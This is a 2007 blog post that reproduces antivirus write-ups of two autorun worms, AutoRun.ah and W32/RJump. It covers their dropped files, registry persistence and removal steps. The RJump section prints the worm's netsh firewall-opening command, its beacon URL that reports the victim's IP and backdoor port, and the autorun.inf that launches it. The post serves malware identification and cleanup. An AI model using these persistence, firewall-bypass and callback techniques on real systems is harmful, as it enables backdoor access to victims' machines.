Thursday, December 06, 2007

Autorun.inf Virus.Win32.AutoRun.ah

his file virus is a Windows PE EXE file. The file is 380 416 bytes in size. It is written in Delphi.

Installation

When launched, the virus copies its executable file as follows:

%System%\config\csrss.exe
%WinDir%\media\arona.exe

It also creates the following file:

%System%\logon.bat

When this file is run, it will launch a copy of the virus:

%System%\config\csrss.exe

In order to ensure that the virus is launched automatically when the system is rebooted, it adds a link to its executable file to the system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"Worms" = "%System%\logon.bat"

The virus also creates the following files:

%System%\config\autorun.inf
h:\autorun.inf
f:\autorun.inf
i:\autorun.inf
g:\autorun.inf
k:\autorun.inf
l:\autorun.inf
o:\autorun.inf
j:\autorun.inf

These files will be launched each time the user opens the corresponding hard disk partition using Windows Explorer. When one of these files is run, it will launch a copy of the virus: %System%\config\csrss.exe.





Payload



The virus modifies values of the following system registry keys:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableTaskMgr = 1
[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoFolderOptions = 1

It also searches the hard disk partitions listed below for files with an ".mp3" extension:

d:\
c:\
e:\
f:\
g:\


h:\

These files wil then be deleted.

Removal instructions

If your computer does not have an up-to-date antivirus, or does not have an
antivirus solution at all, follow the instructions below to delete the malicious
program:

  1. Use Task
    Manager     to terminate the virus process.
  2. Delete the original virus file (the location will depend on how
    the program originally penetrated the victim machine).
  3. Delete the following parameters from the system registry (see
    What
    is a system registry and how do I use it     for details on how to edit the registry):
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
    DisableTaskMgr = 1
    [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    NoFolderOptions = 1
    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "Worms" = "%System%\logon.bat"

  4. Delete the following files:
    %System%\config\csrss.exe
    %WinDir%\media\arona.exe
    %System%\logon.bat
    %System%\config\autorun.inf
    h:\autorun.inf
    f:\autorun.inf
    i:\autorun.inf
    g:\autorun.inf
    k:\autorun.inf
    l:\autorun.inf
    o:\autorun.inf
    j:\autorun.inf

  5. Update your antivirus databases and perform a full scan of the
    computer (download a trial version of Kaspersky Anti-Virus).

Or

To find and delete malicious files using the Windows Find or Search utility



Follow the instructions for your operating system:

Windows 95/98/Me/NT/2000

Click Start, point to Find or Search, and then click Files or Folders.

Make sure that "Look in" is set to (C:) and that "Include subfolders" is checked.

In the "Named" or "Search for..." box, type, or copy and paste, the file name, autorun.inf.

Click Find Now or Search Now.

Delete any files called autorun.inf that are located in the root folder.



Note: The only 'autorun.inf' that needs to be deleted is located in the
root folder, which is c:\, d:\, and so on. Any 'autorun.inf' files
found in subfolders do not need to be deleted.





Windows XP

Click Start > Search.

Click All files and folders.

In the "All or part of the file name" box, type, or copy and paste, the file name autorun.inf.

Verify that "Look in" is set to "Local Hard Drives" or to (C:).

Click More advanced options.

Check Search system folders.

Check Search subfolders.

Click Search.

Delete any files called autorun.inf that are located in the root folder.



Note: The only 'autorun.inf' that needs to be deleted is located in the
root folder, which is c:\, d:\, and so on. Any 'autorun.inf' files
found in subdirectories do not need to be deleted.


estart in safe mode(scan with virus scanner and spyware scan,



may need to turn off system restore...



also run regedit and check whats in run folder

HKEY_LOCAL_MACHINE\SOFTWARE\

Microsoft\Windows\

CurrentVersion\Run



disable/delete unknowns if any,

empty temp folder

delete old caches files



figure out where you got it from, to find better answers...

W32/RJump.worm


W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089

W32/Rjump.worm is a worm written using the Python scripting language and was converted into a windows portable executable file using the Py2Exe tool. It attempts to spread by coping itself to mapped and removable storage drives and also opens a backdoor on an infected system.

Aliases

  • Backdoor.Rajump (Symantec)
  • W32/Jisx.A.worm (Panda)
  • W32/RJump-C (Sophos)
  • W32/RJump.A!worm (Fortinet)
  • Win32/RJump.A (ESET)
  • Win32/RJump.A!Worm (CA)
  • Worm.RJump.A (BitDefender)
  • Worm.Win32.RJump.a (Kaspersky)
  • Worm/Rjump.E (Avira)
  • WORM_SIWEOL.B (TrendMicro)

Characteristics

Characteristics -

-- Update October 17, 2006 --
W32/RJump.worm has been deemed Low-Profiled due to media attention at http://www.betanews.com/article/Apple_Ships_iPods_with_Windows_Virus/1161112089

Upon execution, it creates a copy of itself into the windows system directory:

  • %Windir%\RAVMON.EXE

Also create a non-malicious "RavMonLog" file that contains the port number on which its backdoor component listens.

Adds the following values to the registry to auto start itself when Windows starts.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"RavAV" = "%Windir%\RAVMON.EXE"

Symptoms

Symptoms -

W32/Rjump.worm creates a port exception for its backdoor component to bypass the built-in firewall of WinXp by executing the following netsh command.

%Windir%\%Sysdir%\cmd.exe /c netsh firewall add portopening TCP 16942 NortonAV

Note: The backdoor port opened is randomly chosen.

Posts ip address and backdoor port information from an infected machine back to the virus author via the following URL:

  • http://natrocket.9966.[Removed]:5288/iesocks?peer_id=%s&port=%s&type=%s&ver=4sD

Method of Infection

Method of Infection -

W32/Rjump.worm lists all mapped and removable storage drives on an infected system and drops the following files onto the root folder of the available drive:

  • autorun.inf --> used to autorun the worm when the drive is accessed
  • msvcr71.dll --> Clean Microsoft Visual Studio dll file
  • ravmon.exe --> copy of the worm

The contents of the autorun.inf are as follows:

[AutoRun]
open=RavMonE.exe e
shellexecute=RavMonE.exe e
shell\Auto\command=RavMonE.exe e
shell=Auto

Infection occurs when a removable storage device or a mapped drive hosting a copy of W32/Rjump.worm is accessed and the user agrees to the auto run prompt for execution of the worm.

Removal -

Removal -

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Stinger:

A Stinger Standalone removal tool has been released to assist in repairing this threat.

Variants

Variants -

    N/A




posted by Unknown at 7:13:00 PM

0 Comments:

Post a Comment

<< Home